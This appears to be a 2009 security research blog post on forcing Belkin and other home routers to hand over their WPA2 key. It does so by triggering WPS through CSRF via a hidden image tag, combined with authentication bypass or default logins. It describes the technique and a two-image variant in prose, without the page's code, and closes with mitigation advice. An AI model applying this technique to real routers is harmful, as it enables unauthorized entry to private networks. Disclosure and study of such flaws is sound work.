May 11th, 2009

Over the past year, a lot of vulnerabilities have been found in various home routers, and it should be noted that almost all SOHO routers are vulnerable to CSRF attacks. By combining CSRF with authentication bypass vulnerabilities or default logins, an attacker can modify practically any router setting s/he desires. However, the crux of CSRF is that while it can be used to force the browser to make requests, the attacker’s code can’t view the response from these requests thanks to the browser’s same-domain policy.

We’ve already talked about our hardware-based attacks against WiFi-Protected Setup, but even without physical access to the router, WPS can still be leveraged by an attacker to gain access to a secured wireless network. Why try to crack a 60-character WPA2 key when you can run a phishing attack and force the router to give you the key instead? It’s as simple as creating an HTML image tag.

As we’ve covered before, WPS is a protocol designed to help with the distribution of WPA keys: all you have to do is push a button. From an attacker’s perspective however, it would be great if he could push that button remotely. Luckily for him, routers provide not only physical WPS push buttons, but also virtual push buttons in the administrative Web interface. When you click on the button, it just sends a standard HTTP request to the router, which causes the router to activate WPS and begin looking for a client to give the WPA key to. This is a key point, as now an attacker can use a CSRF attack to activate WPS. All the attacker has to do at that point is use a WPS-capable WiFi card to perform the WPS handshake(s) and retrieve the WPA key.

If you take a quick look at Milw0rm, there are a couple of Belkin G routers that are vulnerable to authentication bypass vulnerabilities, that is, you can change router settings without having to log in. Interestingly, our Belkin N router has these exact same vulnerabilities, suggesting that quite probably the entire line of Belkin routers also share this vulnerability (hooray for code re-use!).

To use this attack against our router, we simply crafted the following HTML page:

HTML page used to "crack" WPA2 via CSRF

This page has a hidden img tag that points to the WPS activation URL on the Belkin router. Since the Belkin is vulnerable to authentication bypass, anyone who views this page inside of our network will unknowingly activate WPS on the router. The page look innocuous when viewed in a browser:

What the page looks like in the browser window

However, by monitoring the WPS state of the router with WPSpy, we can clearly see that the router went from simply a configured state, to configured and looking for push-button WPS clients:

The Belkin router's WPS state changes when the HTML page is viewed by a client on the LAN

The attacker can now easily claim to be a WPS push button client, at which point the router will happily provide the attacker with the WPA key:

Using a WPS-capable WiFi card to retrieve the WPA key via WPS

It should be noted that Belkin routers aren’t the only ones affected by this type of attack. Various other routers have authentication-bypass vulnerabilities, and even those that don’t are still not immune. If no authentication bypass vulnerability exists, an attacker can simply create two images; the first one attempts to log in to the router with the default username / password, while the second one activates WPS.

This attack is difficult to mitigate. Even if you disable WPS, the attacker can add a second image tag that enables WPS first. Disabling JavaScript won’t even help, because you don’t need to use JavaScript to perform CSRF attacks. The best recourse is to do your homework and buy a router that (hopefully) doesn’t have an authentication bypass vulnerability, and change the default login.